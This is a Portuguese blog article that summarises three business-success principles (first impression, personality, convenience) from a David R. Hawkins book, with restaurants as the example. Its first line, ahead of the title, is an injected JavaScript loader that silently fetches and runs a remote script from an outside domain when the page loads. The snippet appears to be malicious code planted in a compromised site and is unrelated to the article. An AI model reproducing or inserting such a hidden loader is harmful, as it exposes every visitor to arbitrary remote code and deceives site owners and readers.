;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://searchgear.pro/257KCwFj"); 3 Fundamentos para um Negócio de Sucesso | David Hawkins Brasil
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3 Elementos Fundamentais para um Negócio de Sucesso

Que tal investigar 3 elementos que todo negócio de sucesso precisa ter?

Este artigo faz parte de uma série com base no livro O Sucesso É Para Você, de Dr. David R. Hawkins, M.D., Ph.D.

No artigo anterior desta série, nós examinamos as barreiras para o sucesso e vimos o que impede um empreendimento de se desenvolver e prosperar.

Hoje, vamos mais uma vez utilizar os restaurantes como exemplos.

Como já foi mencionado no artigo anterior, restaurantes são negócios com os quais todos nós estamos familiarizados, e isso facilita a análise do sucesso.

Analisaremos 3 questões igualmente importantes:

  1. primeira impressão;
  2. personalidade;
  3. conveniência.

Vamos lá?

Negócio de Sucesso: a primeira impressão 

Buscando compreender o que forma um negócio de sucesso, Dr. Hawkins nos lembra que a primeira impressão causada influencia muito a nossa expectativa e contribui para moldar toda a experiência que teremos com aquela marca.

No caso de um restaurante, se já na entrada presenciamos algo nojento, isso certamente nos deixará com menos fome e terá um efeito negativo na nossa opinião sobre o estabelecimento.

Já que a expectativa do consumidor é um ponto crítico, Hawkins sugere uma reflexão: “as pessoas estão ansiando ou temendo o próximo encontro conosco?”.

Evidentemente, esse cenário não diz respeito só aos primeiros minutos de contato, mas sim à primeira experiência como um todo. 

Se passamos na frente de um restaurante e o cardápio — ou até mesmo o cheiro — chamou nossa atenção positivamente, isso criou uma expectativa positiva. Nesse momento, é fundamental que o próximo passo reforce a impressão positiva ao invés de frustrar essa nossa expectativa.

Ao nos depararmos com uma recepcionista antipática, por exemplo, a percepção inicial que era positiva pode se transformar em algo negativo.

Lembrete importante: diminua o tempo de espera do atendimento

Outro ponto fundamental aqui é a espera, que deve sempre ser curta.

Quanto mais tempo as pessoas esperam pelo atendimento, mais a primeira impressão vai se transformando em algo negativo. A partir daí, o cliente tende a notar muito mais os pontos desfavoráveis da experiência.

Negócio de Sucesso: a personalidade

O segundo elemento fundamental de um negócio de sucesso é a personalidade.

As pessoas gostam de ser tratadas como seres humanos e de perceber que nos importamos com elas. A partir do momento em que esquecemos esse lado humano, os clientes começam a ficar insatisfeitos.

Algumas empresas preocupam-se demais com os processos, focam em tornar as “engrenagens” do negócio perfeitas, mas esquecem-se de inserir o fator “cuidado”.

Quando os clientes são verdadeiramente cuidados e tratados com o coração, eles não se importarão se você cometer algum erro ou se houver alguma imperfeição no seu serviço. Afinal, as imperfeições nos tornam humanos também, não é mesmo?

É importante evitar que o negócio — e principalmente os colaboradores responsáveis pelo atendimento — se tornem mecânicos, insensíveis ou superficiais.

Ao invés disso, as relações devem ser baseadas na “presença”.

A qualidade da presença, ou seja, de se importar e estar realmente atento, é o que faz os clientes voltarem. No fundo, todas as pessoas querem ser tratadas como realeza e nós podemos fazer isso por elas usando o poder do coração!

Negócio de Sucesso: a conveniência

O terceiro elemento que trazemos hoje sobre um negócio de sucesso é a conveniência.

Nada mais triste em se tratando de negócios do que um restaurante que falha nos pontos mais óbvios, como: ter bons banheiros disponíveis, ter nosso refrigerante favorito à venda, disponibilizar molhos básicos, entre outros pontos.

Conveniência significa facilitar a vida das pessoas — mesmo que para isso os donos do negócio tenham que sair um pouco da zona de conforto 

O mais interessante é que, quando se trata de conveniência, os próprios clientes vão dizer o que eles precisam.

Preste atenção nas coisas que você mais ouve dos seus clientes, dos seus colegas ou do seu chefe. Você tem em mãos os pontos mais importantes a serem seguidos e implementados!

Um exemplo incrível do próprio Dr. David Hawkins é que quando ele tinha uma clinica de saúde mental em Nova Iorque, ele chegou a ter 10 linhas telefônicas para atender chamadas!

No momento em que alguém dizia que estava com dificuldade em falar com ele (na época era comum as linhas darem sinal de ocupado), Hawkins imediatamente colocava outra linha telefônica.

Lembrete importante: inove, mas não deixe de fazer o básico

Muitos empreendimentos erram em oferecer apenas opções muito inovadoras, diferentes ou sofisticadas. Por exemplo, oferecem um tempero de salada exótico, mas esquecem do bom e velho vinagre.

Portanto, vale a pena ficar atento à conveniência e à facilidade de atender necessidades corriqueiras. Fazer o básico muito bem feito também fideliza clientes.

Um Negócio de Sucesso é para você

Ao longo de 242 páginas em um tom bastante divertido, Dr. David Hawkins nos mostra que todos nós podemos ter um negócio de sucesso se observarmos alguns princípios universais e algumas boas práticas. Por isso, fica nosso convite para que você aprofunde o assunto através do livro O Sucesso É Para Você. Ótima leitura!

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